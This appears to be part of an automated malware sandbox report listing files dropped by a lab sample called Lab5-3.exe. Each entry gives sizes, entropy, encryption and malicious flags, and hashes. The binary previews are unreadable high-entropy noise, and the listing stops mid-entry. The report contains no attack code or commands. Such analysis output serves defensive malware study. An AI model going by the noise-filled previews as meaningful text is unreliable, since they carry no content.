                                                                                                          Preview:./..K...!..F2......dB...#..):.b....EB...J./O.....r..G.jU..V.....rv.W..<.s......c....[.m.....?#....Og...2.C .E.R..%.p.e..C........\..dl6..y`..J=\..a.5.Wa[...^ ...... .V....{..;...3-..F&........m....#.fC.t...|/,....OW%.li....8.W.$.../...JL,.:..b....A....:....X....:[......52'Tz$Y.G.4r.o..._$...D.JjTU;.89./..MY. o....e5.I.<.Y....x....$XQ....mT,7'..<..;...s..i.[.J|..u.C.(Pe...8qL..(.sXcY..S...)'..w..C.n2.....*..i.7..DJxr...r.}W....u.....v..W.D...y.>.QD.........2|].0.5...p.....=.'...!s'....t..m2.l+...OA...a..J{[.oOB..b..0.I,..^(.%../..>{.*..+.A...9..W......3..ah.KS.V...YO."..E.0i..O.v.....].d..D..._....\.....9Od.7...).]s..#.Na.m9.../n.)bH..$a....a.!.A.c...;%."p..#......V.x.8.b..o._......QP>T..i...K..h.p.....O.#N......2w.......L.tR@.sGP..8e.q.?c..wp..8-....1......./^....id._.n...N..#.....Q..2.0....3}......!....!c...y.[.C...6.....oKQ+....k..\.b...K..@.|.....O...e}....L<.....J.>....ix..zn.....A.%Q.xIE. ....(....&.1....w.b........SO`.W..{."
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5040
                                                                                                          Entropy (8bit):7.967087115618233
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:yOxpuWlkQOJT0s1FY4EhbeSaP5H6CD0HiqTpIlwGx0uKeY2ElUJ:pxpxlTvs16cSuJ6c0HiGpIp0Cb
                                                                                                          MD5:F90D0F1A6CD2A63F56EF068177D9E647
                                                                                                          SHA1:12999A9C4E09AB339288FF1DD81F71B0EC426F3E
                                                                                                          SHA-256:9D071FA4BF388F172189C364BCA832CA63E44430EC8A457695FCEEC14073F15B
                                                                                                          SHA-512:35AE9551E59F7D05D5993D7B4A90BC8E332E8A8AF813041564ECA793941F49ACBA040F3E1D2A4CCD21F221F878777D863BCBB75D891FED3EA1A99904184A8F20
                                                                                                          Malicious:false
                                                                                                          Preview:.>~......V...\.......'b'l^b...|M.d..hI...>.7%.Y06.[#...N....C+xG.!......XL)o..l........3.-..}.y.....h.k..P..Wo.. ... ..f&...m..k. .y..L^a5....~../....P.F.i+..HQ*(.Ul[.......m..."-7w.w.....]........o..e.m_.......g.X.6AI.......f.Lw.N...:.^.O......*......@.0..0........K..Im.@39...........*..... .^Z...Fn....@Z....%.xu.Tm.b..Lp...{.+s....=%1j...0.#E..M........a.R.n...NC~.7...h.~....[.z....>K....01.Mm..V.\..%b..tF.....l...(U9:..:._.s..q../."...]...].....b$.zV.........`^I....\r....kJ.~}...dvJ..<.N.S.N.M..n'y.p4X.,..8..3...........O~......:..K...>...tV....a|..\.....(g~..S9.1...8..A..|G.p....ep.m..]D...}.RM.....[I."?.../;..s.....C&4'M.g..G.q...9.Ei..].$..#.R..#.pO....... ....z.U....1..j.._.yu*...#.m....8.C&.....>.#...<..V.F.ey...Sc.25?..;..._..3.....s.!..c..@.....bN..e.#6U}.:...)Hr....L`{.2...x.!...I{.dX..-.........rgDZ....f..y.Ln.o..j...|q.$.m.#..O3.uq.......vhr...........B...C....rj.(..Ei....Oj......:.&.......\.jQ.....F....$4l,..{
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):55696
                                                                                                          Entropy (8bit):7.996833483516358
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:g99gK1DZ0rP+vV2ZWY2ZdrD+wpQgehQ8lo1zWlSiSZ:s51DZY+v8Zd2XrKwpQv6j1KlDSZ
                                                                                                          MD5:480D7C11AAD33F7373B16F7A25B8B96A
                                                                                                          SHA1:4C0DAAEBD6A61F7AFFE875E34A139FDA867BC0B7
                                                                                                          SHA-256:695DBE2158B5DE51133A1B1BEF116820175E14EDA8325528EB9EEA3E2A43D799
                                                                                                          SHA-512:E8A691F251FA44693FB2E1BF179E09B82B55CBD0DF01C6C8060266B74D614F1276068B86D01F3A65B4D18AFE79EB52E2A8E8994C4FEC8E86109CC7593F46126A
                                                                                                          Malicious:true
                                                                                                          Preview:.h...|.2.G......D.\|..~+....2.{........PGR.:.$...C.........M..2H.N-...Xuy!.d.G|.h;.e...v.|.s...Xjo..H..gP*h.]...y.u=.%&.......k..- .a..x..x`..L..3.$..Wv..%......3m.V.c......e.....0.J....`..L.....W...^.......B.u.L).xA..tiH..?..K...[=......cE./O..u0.[....>.&...~.%.@..O#M`..V.....BE..s{D....}.....Ga..C.yx/c...#......ck..3.\.}.h5&#..L.C.s..l...R...[u...(...m........N.=.Q.......>r;.p.w.....,oB...T..w^oP..6...K....}q..[P.Q.@.m..*.X.sI.....6m}_....t....z.+..T.G{'./A..i.9..t.M...A.`...7..[...H}.p.!p|x....#.....CL..2.~..=...#.b[.....`........0j..C.....z..9..%.#.i..&e..')F.=.<.&..IJ......W<......._.....O.~.......,[H2..fC.O.}..7..[.....Ni..,..e.*tT../2..8Q&/..mD.5u.h...n...c.1.....C.q.3..v-....{6.sH...!...7...E.[<...;....Ak.M.l#..R}....a.(._..a5}.......ePsSDv.....33m#......,..X....2...u.w?nR.c*t....7>.9M.!..?....~].B.....[)..m...JA.4r.5....Q.Q... .b/....)....=..../.^..8...Z..;b.....,.B.^0..t.....*#.E..=..<.I...I.y..S..8.^..Oz...-..a.w...5
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4224
                                                                                                          Entropy (8bit):7.956375665197509
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:KFFsMUVZMfaSI++Rue8JjS3gc2YCGx0uKeY2ElUJ:SFsJE1+RuRpS3gcBh0Cb
                                                                                                          MD5:F7D4E45B0E6AAC1480CE7958E02E772B
                                                                                                          SHA1:F016CAF1D63DC8D460EFB43B837882ED6BFEEAD5
                                                                                                          SHA-256:89B3627F87EDC67C6282A68522D358CD2DEEEC5BC043B1E63EA4E65566191F5E
                                                                                                          SHA-512:FDEF3D25DDD5E1A0074A28E1A4A48DB264C90E02B6A1239269EDFF0C26C238C235EF9B75261417D2A076190749D046F77A2634227BD5973D3B55982252165A5C
                                                                                                          Malicious:false
                                                                                                          Preview:A.*.TT ...aB.GfQ.1.8...N..!..P..e... .#.,$Yh.<-Q.!.A.E..=.....1..z.......N..'Y....,.?..x...3...^...K..6y..q...,*=@....t.&\.&...89..o?.......4.....Vf.....m.W....i?...%Z..."...e..v....ly?OF.w..s...M.-..`....iU.Cd.r...9.....9M.y+..@.....cpU`|....>].r."..tf....G...v"/.])...R....Mb.Q.vH.."".W#mhu..o6...J.u...,:...C....I.SqA..&....x5}.R.{...8 .....<.R;$...=eQ...e..r......aN..$..\.f.2%.....N.:.H..2.e.f|..D..Vl..'..-......X....{........^3.K...vv.Gu.u...U69.s...x....:[.R...=..{.|...B..Q.L.Z........s.uC....f._..8.........s4..g3TE.3. .w..Z.....F_...{u...I'....^>D.X..EPq%...#..$.%....GmAe..W..}...+o.=E$s..\...3o....g.....e5S..{...(.,.....|.6G...P.....:]e8.Q....S.(K.k..X.%.".:..TgF..3L....dd......&....@....}!..SE~.u.OD.j.../q{.........q.a.d..c+....L.>..E..C*..3{8..2u.*og....-'....r....-/.p...@.oW[.o.....x.pfD...{...6/...L...p2S.j.*.sIA$]..G=UL.g..x.....$......,..4/h.,. .e.=..VI...x>^..s.......R..D...d....@.5_...ar#T... 4$...u<w...)....b\..N.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4016
                                                                                                          Entropy (8bit):7.956703300352246
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:InnAa1aQlC8MqJX1UVGt6ph0YbILYFGx0uKeY2ElUJ:GAa1lLM6X1apCYbGYe0Cb
                                                                                                          MD5:706918F5B1DCEADDB56F94220CC579BB
                                                                                                          SHA1:BBFB2BA710E82161B2BE00049E253EC09DC99984
                                                                                                          SHA-256:2BB0723D144A622F8FEA50078CED8E5798C819EAEBD76E6B2D973F4C2D36D1B5
                                                                                                          SHA-512:96E74DCBD2D94DAA4B158AC59E6A660B651E24C49B91AB324A389E5B1F13D1C185FD401883DC4A6CA87985D4BAAED865C82A3669A98123C982A6867916CEFED6
                                                                                                          Malicious:false
                                                                                                          Preview:.\n....xEM6...]E?.T....\"....h..|.H......hps.n.l.k.....!....."uw.v..5.....iQ.M.5.).F...h..%.p.H.A.z.GMs...h......hG.......d............j.q\..|CD......^....v/k6.t#.....K'...z..`.k.Y...V{...hXKts..3.........%zn..>.i.4IQ..'..f{PH.N..@...a.G1..rqev.....f.4.1,d..~d.Y._.WQi.).}Ja.D.i.(._..{/.....x.].f.@......a.zb......q..:a.Q.@.k...|BK.|s..4q^.^.o..G.(.;..'.bng...{...'.C.B..>..cGsrU....:5&.0.;.."w.......cO-..I..=..C....B1.M....7 sC.....8.gi.kB....?k.......J.K=........r b.'...`.u.w...1?...LQ@.<....\.....L.\.g.Q-.f...K.....3..o.oZ....EfP.F....3.. (......:.m.R-9.7|Zb.0.{...j@..Fk._.AV..t..[.HG..e......F.L%...o"..Y.,..I..v...|q...P..Lm?...=..W# 1..2(.r...SC@N.v...-..2.....m.?~{.\.>w......lJ........J...V.......2....Z{aTN.O...<.VJ.;...5)G..d.VH..R..,..uZ....Xq.>..sIxH...M}+nzS....0.I..u.tB....L9..M....M`9.4ev..O..$.......o...q.vu....b.$.......7.W.QaYZn>..5.P./>...eo..:....x....]"...>*<..*...;..9....V.b.j...(E,]..g..o...p.....i.1q..,.A5Q.>.x..3.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.895916913048187
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BLJ3d6r3IQIHfUTid3hBaUoSGFcmeykEdEElU92i:BLZdQvGx0uKeY2ElUJ
                                                                                                          MD5:40465EE1FE2E3AB5B9C887C886531E6F
                                                                                                          SHA1:FF8DB30973C57F2A73DBF20B7259E53C5BC81F79
                                                                                                          SHA-256:43EFE5A1F3A8A8210D76669DF6BBB18F5529236AC53B955C6E4599FC940B1F0F
                                                                                                          SHA-512:8C7F4B2F8CB066CFE3E1C0F2C8F43EFBE19984696B4F7FBF3C329F753F809AE35B06407A2B7D1E29EFA0FF994C6D813C488938E20E64BB09017EAB46A6976CE3
                                                                                                          Malicious:false
                                                                                                          Preview:....&...I`..X.."%.%.c.%..D.......$.q.?9..Xi............S.^..cp....".G0\..X.v.....8.(.Dz..G..H..A...,...`....*'.....8.....6V.!/v........V.T....`Q..5.F.z...iv3..]....J.ZV..F..N."+...e...k.nj.Z.k..D.+z.4W.B8X...u..3$....~_...Q.....j..(.{.}Vh..t..y.x........T..;..5...xXQx.......'...>./5....MTAr0|N.Tg'.....Et....H".GZ...;5....j.......;=V....R.....L&...VP..dZ6..o.a...h&.)...8.....c.v.]...&?..|......H.7...6.y...^............TB.!mx.".)Z.Z.P.pvV.$g....t_G.nX...i...C......l...uk..7nY...A..8....I.-e.JFI...^V...|...s....n...0...l.d....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.910315313025136
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:g2yHmzu06tUPHfUTid3hBaUoSGFcmeykEdEElU92i:6GzuftPGx0uKeY2ElUJ
                                                                                                          MD5:DFEE71932DA096BA229BB028FAEE63D9
                                                                                                          SHA1:21F476F3B9E64A48CBA81C0B1D56685238CA162D
                                                                                                          SHA-256:8327177D506EC949ED61A5AAB89C9B400DCF1CA0AC261268DB84BA6EA3D6F295
                                                                                                          SHA-512:2B0B12583C2AC9BD3CAA7D438137E055D21671211442165912EE383385EB239F174961B24FF47756F504D84797FC4E265388FCDF478C035A685475B8C7C9F203
                                                                                                          Malicious:false
                                                                                                          Preview:........<E..&/.....W..5....m..#...f.*L.J1A..|B/'"..)h|M..j..._..=X<XD+...^Vp..:.N..n.g.~l...Qe.W.E....>.I..4XmL..*..N.y....~<..t.H.s.uY...p[..kc.......RF.......K........r5.#K..f'Vz........b..gz...D......B..*'..t.^T.\.r.Grve.....-.V.c&.............. HZ=.-.1@Y.pC..GG...x.;S...h...sS.....Xdk.iq...3qE.~O....$./..R2.I(..u...mF*.]rn.!.0k..W@........ aKTz.Wr.;..F..)2.....o`#FM..E...C2.z..0t....<.v.......wE...AnA.....kM..G.aw.7.n...;5..r..n ......pP+...P..~jp=#.'..X..Y#C....?...!Z..-...B:...'..Av.....J.~.%xT.M....m....@.X.....0v..........[.........<.../.yI.3..@..7.s]..p.z:[#.}o..I...@o..@.S......l.u.Aqp...$...7.7.._..k '.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):7.9274951064574
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kvfPyeav3L3x59sYcA5Y0TT1z/P+HfUTid3hBaUoSGFcmeykEdEElU92i:kXPyeObVsvAq0ThLRGx0uKeY2ElUJ
                                                                                                          MD5:B4709171461B42BE8FB8CAF493CACEEF
                                                                                                          SHA1:A3243F860B1CA4033CD53ED6DA6403E7DBCA9FD1
                                                                                                          SHA-256:B5405CE30E64CD8C5E5C35D736B2808DF4C7E4D5136C8E6B323B33C51B5FC1A1
                                                                                                          SHA-512:3ADF290B07CBCCE5A0E23240B5082A6B2CDB757DF16F5379E7B5D449B9D0C2B789B98F2A1DA8D228587683110C9DECFEF93A6D66D419ABA1E41FE39A4C3B2CE3
                                                                                                          Malicious:false
                                                                                                          Preview:H7...x....l...@..{J..Uo..XoT.o'.+;Yu.v..+.L.C..7...P.....#.......g.<...A3.$1C?U.zt...1.2.H...........~..P.~..#.....S3...T....gj.V]/..6..XX..@.....na..:.4...b.)..QC..qx.{..G+."a.M.6.[CS.d=a.....8........y.C...-.D..9.S...C...9...~lQ'.ln#.)..J..>@@J.sY....2'..C..s..a...-V.u.>...?5.\........j....B......~+...Z..k.D{.......cZi/..."v.L..aj.z#D(..#.U..C7...N.......j.....2....KvM.wZM..Nn.....k.q.^s...G....!&H........d..}....8...x.w...L....fT.HA.*:.v]b\.O.s%...p\..6....;yyW........X...w-1>..&..0Y...G...\.G?J..;...=H.-f.}x@.*8..U+.u2D.o...<.?.......,..uE..@"..._.#....../5.A.#..ZT......6.P...A...sP.`2c.v..+1u...y...9$vI..)..L.y.^.H.5j.TD.D...$.....$._p..4.B.)...._..}..I.ny....\.R..m.>.8j.o]xLp?..Z...#..l9. ..2....d&..ta?v.'..pF5.2f..Qr..Au^.`."H....H..1.L=7*..=.....,..=..VC........8..K.d.{.He.4/.'.3dq...r...l....W.....K...i..k~.......%....90J.1.a...#....N...|v.w5..4.xk\Df. .fb.kg.}.~.}G..%.....a..Hy..6G.5..y"{<.1.u.j.....6..ZO.MPtJ.U.K.4..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3184
                                                                                                          Entropy (8bit):7.946546364497646
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:+ifZdS3/V3wPwWs3JEQA4OdzwGx0uKeY2ElUJ:+iq3m4KJFdn0Cb
                                                                                                          MD5:F356357F08217D789ED79B46EB2B7BFC
                                                                                                          SHA1:246E6D76BA280B7EA66AB9D0A4CF458B0AA9984B
                                                                                                          SHA-256:0BCA91E1B71330276C0F7412C71C07539B1F272860AA829FDA38EFF9EBAA455B
                                                                                                          SHA-512:2563D144AE187E152EFD69CCB814CE9A549CEBF02F6391733760687527A3CED200DAF42606368C38CA3CA77289BAF217201CE02BF0395FBAA7A8F7C2C4375E95
                                                                                                          Malicious:false
                                                                                                          Preview:...?..,Mq....:..).& .....S....>..c!..I..}...j.N..V....1..:t......G.......w.<.-...w.U.o.Kiq..e.+_.O ....H..C_`...{.....6......~*......Vd?P'.T.../...*JI..L...9..n...../..rQ`a.......U.\S.P.......$)Q......$Ff..W....q^.0:...... &.n.:.f...kR..:}o0..P.f.o%...H..J.R.......&..3jlW=..Bb......(.sm\.,S.Ry....#......g.A......%.;L+.P.^.@.m...FR.....~.i.}... .<P.....f.......Q....l....{.|.t.>.fv.Gu.Q....E..Bkq..%!..X.OI.....(x..b}qm."8...6...0..S,. D..y%.7Q.O+....f...='.A.B...MK.5".r..|3......y{`..g.Z.O.F."..v.......Z..ug...r62r&>[J...*XFLYq....Di......%....7..A.z..EW.Ua-i#.#m.Q.../..c6.l....[Q=5J....l..<.N....M<r..'..E...//.U&..A.%.sO.@V..=..P..`...C...0..%.J..@....kd...a...%~...$&.....25..|0.f>...-.......e....]..G...u=.vU.th.!j..,.M.*.W.g.,..p.......K..$.....p..qM.<....2........X9.....Uxt.fUU.{.Gpt... <..U.A..K.E.k<.c'M..c.......[..g..@|.....k.-....8. .X...y..d.t....+Cfv...y. .W.....f.G^..".c..qZ.<...J...v.W~.c...U.F.....k...{....(.X6*&.&dnx.....k.w.X.v
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2800
                                                                                                          Entropy (8bit):7.946936928108876
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uln32iA7oi028RBXxrZR5FaXVHfUTid3hBaUoSGFcmeykEdEElU92i:Y3aoi0xFx/5FaXuGx0uKeY2ElUJ
                                                                                                          MD5:66DAF7526F8079D399E3D838104093E2
                                                                                                          SHA1:F3D67DA1850E21AD11FE9CC21D3583ACF6F384A1
                                                                                                          SHA-256:AEC007B4961C056CA649A679DAEEDBD4758DC399E8337907950141C70DDA3471
                                                                                                          SHA-512:354C6DDA61A48733525CD423352D120F8040FD0F74B11EC0BDA1E35C4E3990F93121177431842EDB4380FD1714F0DB62F0849B3C2FB78B51C20EA65FD4FB8A17
                                                                                                          Malicious:false
                                                                                                          Preview:.'...p#.[J.3..X..f$a..Zi...m4.....}.J......X%..y.x........FrNd.......>&;.4......M.C........l./.!.....ts.....+.g..V...B..aM0.B.s....icH.B....2S.,...$u..%..Mu./....j...W..a..J(.1......[.....z.kz....?..e+Ug ..d?o(.F..8>.....r....}...m...F' t....c\..........q..m*.%..?..(.../..q_..cwv..Lg.%....]X.....<.>.VfA........#...a$p....u........w..}..D5..\l.G.}..b....R.\.|...../....K.I..b.+.........'...$....%........^...d....7.g_.G7..P....V.;....fl....qQ\../...-..B.D..'..bY..XT.)r1.g.,.#U.i,?..Q.*.......>".........[......2v.KQ.H.p.....&[.K.g...f&Q....HQ...."h...K..QaB.G.&..c......!...vq.&.b.84.].t'.7.#....n..~q.B.c..aM0./.0.].@hD..........j...:_..':z.%...p.F.._......g.]...S..3...*.G..7.^.E=.1'.....\r..R..\g.yu.8..(...UyQi9.._p..3..|9.9w.Vp<w.@..;+opVN6..3..&wl.ds....o...@...5..{[:.\.^.>6.....k.r..T.(..t..}.!Z...]...Oc...U..l.$..s,Z......;.g....U..9.Q...d......0...F..D...VGm...5h ..(.b.5.....K.b.|!..c.@.X.d..9...;...^.=....u..y,.mx...G!K8...NQ.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.919717472917825
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:a7819ZGPvuksovMwprHfUTid3hBaUoSGFcmeykEdEElU92i:aY5GLsoIGx0uKeY2ElUJ
                                                                                                          MD5:964B94415DFFB4885539E294FB2560AF
                                                                                                          SHA1:27AA6A5FA9E70A18C8C7B5CBE966774985D066FB
                                                                                                          SHA-256:EF68ABADE8BA7448555BBD4601A812A22376BA465801FEB7E96AA83B82116D20
                                                                                                          SHA-512:D17731C6521017D864FC65F2F9537AFBB4CF4D5850382B3064403E7777A92053953A1C48DC33A52AE306F07AE7CDC6BAAEE65892334527C537B95C19466452C6
                                                                                                          Malicious:false
                                                                                                          Preview:..+P+..x..q.s..Ic.n+kf...y..UIx/......%....Q.5v....N.T..K9..E....c.;....7.^..Dr......;].NT...(........._xI..;.G.@x...C#..../......RP..K..?....SW..*.l...&.q..r.3....;:.^...a...I|.L.,..<.Rr.....1...ck....\.Z.n{.v!Y.Vdj.H.I..$..w..k....s....1./b.!CK.........3.V....-.0.D...d.GU.....v.Y..*...H.2.t.4a.....%#.dc..[o?A..yD..18........V........I.....e*.C.u....T........N]j.7.u.E...g...}....k...+..N.)..".}..um...u....l.N..3.o.....8...<~4......L>:K.t..(.RI......L...^Pw.!;W..@.QU..&...U.....;.Y...o.....<HS.7":......t..`..zo.y..t...;3x.&.)......o....p......1L...7b6v/5{....n..s..'.!..k...Z..C.NA..'.n.y.6_...~.... ......T..].'.Z/..L...'...T. ...\...=^...jN].{0..n.@3.wYN.w..B...Q.q;../....#US.O...)'....X{.3@.Y0...:Z.+Q.Z...4../../<.kn.v.p...z..@.dy.L...$.C.*.[..Pt..-t.e..?-...N.?..&QM..b.)n....q..?...6...f.15....:"..L.=N)..7..j..Yh.1..+.l...jC.z.\..`.H..x.i@.}..bg.4."..G..6..x.a..{..v....._....#........J...^s.^.....M,....|s.\.4.E?.xu
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3136
                                                                                                          Entropy (8bit):7.9415766500685745
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:fYw81sHezSLLELcXc0E8wGx0uKeY2ElUJ:fYw8Ke+fUkBD0Cb
                                                                                                          MD5:60FDADDF0E0F94221CE351E21BB00A4F
                                                                                                          SHA1:15180CD5F00AA82B9DD0DBF33B35DA37F7F451CF
                                                                                                          SHA-256:E16E432643A93340A89902E3BA40C67274AD0B25C4065AD320654CC39E98B839
                                                                                                          SHA-512:DB53BC071DC8C60E4270A06456D58CE1530080F4DF71C8B71CEA5B18D3A532FF527CFD3782F3445879FFE22A52B032CE456B9F34D22AB276EBDCCFAAC28DB03F
                                                                                                          Malicious:false
                                                                                                          Preview:.L......Z8....X....".G..;..aV3n.^.i[....ZI.$......G..^......\.."%.,.z....(.\.$,.$......mZD..T..r...L.^.@.....u.`....A.5rd.$..b.'...s.2....%[...).{.T.FE)............{.`^`|.~44.....~.....I.E.7../x..'.}...1j....$..!/N..LC..IRd4..Q..J.[}.G}.7..)C..g...3.._?p.Y..M..p....0...z.Z..h'FDG|..}iq~.... .3<l.t..Cd..-w:...8}..Q...k.I..*J...l...)V;G.e.A.%2.Tx..<.x=.5..3.id..y...!C*w......@",.n.....U.x.9J..[.......<..l.Ca.........S..F.g..%...i..z..2.b..}..>.~..9&......[_WX...!4w...)7.[....0.../t.B..p61W).!.wx..N$..:....H..".....I..<v...&.C.\.J....Tm..0..Q.3.'p.....(.#F..S!>.p...`.O...9......"r..2.(.J.;2..2..T......L..D.1.7\A......qW.x...l8h..6....eW~..P.v.P.z.=.....0E..-..{..c.2........A..l.....4.YE.3x....zM....e..q.\2.....j(&...4.....`.ld.|...).....P.nK...r./ .c....8.o.<{L.....[cT..].99m(.i.....@...-.]S.H..m.V..L.".9u.AF.,..o...va..5....T...Y..Y..,.$gs.C..vM.A................d.p.@q....)?I..L.-]......<...w..{..P.~.<{...uE60p]%Q%.b.9.................2.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2928
                                                                                                          Entropy (8bit):7.93284545737869
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qX2zxUEvOlH8Wb5+7kwvZKyneswsQmHfUTid3hBaUoSGFcmeykEdEElU92i:dzxVWlHITDpQ5Gx0uKeY2ElUJ
                                                                                                          MD5:331FCE7532B60FFBAEC7F4BEFD61909E
                                                                                                          SHA1:51979C36598F69A81E78D06DBCF0D3BA7AE0E936
                                                                                                          SHA-256:E5617D05239FAF7DC94FD0CC7771DCDF9E03E94E187376BB3EC3E436756B2F14
                                                                                                          SHA-512:DEF33F1C3D3F0E2CF6721FEA033C2F6EFE2AEB179BC256624344DD8292F45E70779736FE5A7D02547D1B4F87809F43C52460FF97D803501E1A0949AE223E83E4
                                                                                                          Malicious:false
                                                                                                          Preview:...K[w!.H...`.....a...\u .(C.1b.2.....x..u.t..%,.xt.}..5;0k.C..._.kBw....`.oY..&.B...Sfar.Y.,!.RX..x'.SK.If.t,........s< .6=..Z..;C.k...Ho.....y...\I.Y.]v.e./y.\..D.h.....`...P...6..'.6K..}I.@<W..1..[yH.^.......;.ENI.$....k."A..%.).NV...Q)w.....I..[@q4...T={`....C.W.........cDEmU..g.k..k.w=e8O......P.O)..RN5.K..fL...87.....i>.I.J..j...I.L?"WI.V.m.+.mV).......w^5n..R..N.C.T.3......f.>..A.IWS3.,K..KB......5i....{...}=.;1!.A.........!..S..q;r.R.~y...F...eH...Q.+..#v`qw..n=.q..%...%.q.. .A.p...zY2/..a.N.Da.Qa..-.....e..z........0...vn.V..Pp}<.R!.u.g.H..n7..,.1....Ai....6..G3.....Qe...W.....b/....T...q..!..5G.+h*.Pt..u.U.w..(..K>.Q.o.k....8&.\.~.GH8...V..*.S*egC..}.....R.w).....sa..q..N..@..2.F&...!f.)..'.8!.....<.fO$.f..(8(.[...O..S.H}...7.;.F.~.yn....)..R.-z...7.B1..U.@.Yb.i.7L.P.H~8.D.+N7........2S....n~....O<(X.#.;CE/}..A.[....m.x.[...(S..w+:....o.2<.M]....F.i......:..Gu..cU.......;..sO...T..ci..[W.....A)g...zj....so?.k..b.9B.T.....'.E...7 %
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4256
                                                                                                          Entropy (8bit):7.953886980095107
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:UPK6zBGzKQQW9Ipn0XpGfZJJBie7gDPMGx0uKeY2ElUJ:UPDGeQxIJ0edu0Cb
                                                                                                          MD5:EC367C0FBF893A745141760EEF2F7C34
                                                                                                          SHA1:4C3DE6D0DAD8AB88AFCAC1662C353585B177DB84
                                                                                                          SHA-256:C533BEA644AB3140AD12217BD1483A183F4010A097830B0A16FD60CB4B6705AB
                                                                                                          SHA-512:40D882619D9951D4761359C162F704CFE54FEECA59F370C79FB48137DE07822F746EA774F6453697A6CD8E2762DCB72A939A751A56C796466C634B1006BF51CE
                                                                                                          Malicious:false
                                                                                                          Preview:..*V.......[k..x.;.;^.{...8.|. .H".......'I$..*....A...|..?z..2.nh.0z.....9s.......6.!U.JD(...>,8...[Q/.<N....7..{_..2_I....}M......M.....F.hU........f.i&.Y......G....'......M....*.l1..V....k..y.0f.._..rLfR.......$m.<.$x..EEJWBk^.k..l.....V.....R..............`....?.o..........>E\..=.eO.....M..G%..Z."..~.......0U.NVJ.v.]..I.../U.5....\..K}~Wm.K......p...}....V...'"+..%m..F5'.q..&$w8..1l...w...lP..U.>Sg.z.x`...CGRq`..xM...K.."...z..Q...;.&Q.j%.v..-g.>...J.1.Y.......I.S...h..4.9.&....T...".7..{DzN..Y......p.....f6.@..y..P.>L6.},..{.0.\Gicwsy.y.f.E..>.]..6..j.s$.....*fP..F._.(. ...}+;<.o.4N.H|...&...f.f.......>..%s...um....@.l...N....q..'.H.^.m;J.. ...^H.....#G..=a.rL.i:..rB^..r.o_\;.]7%..l.o.{.w./i#l.*...V.FLj..D....?..e.L....rAR.1{g...X&.i..9.*...:p?....B...v.[..z...a.`+....^.V@.h.}.........3.n..).'.pV...5..].H...B.v....5g..U....C,...g./H.....$./Jq.....M>..^J.=O.Dyhn.s_.w...y.!.D....i...5.>W."1G.u..E........Y).r.4%zM...%>.A}.8...cuZy0.%G.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4224
                                                                                                          Entropy (8bit):7.959099664298461
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:MncFfBVDL+6baDQnE6rfTqPxqNqXd/U8Gx0uKeY2ElUJ:MncV+6baDQE6TuPxOw/UP0Cb
                                                                                                          MD5:798F8405BF7FDD9209CB752D3B7B09DF
                                                                                                          SHA1:1E0FF2D293E504D356ED4499C958026DED3CF3C0
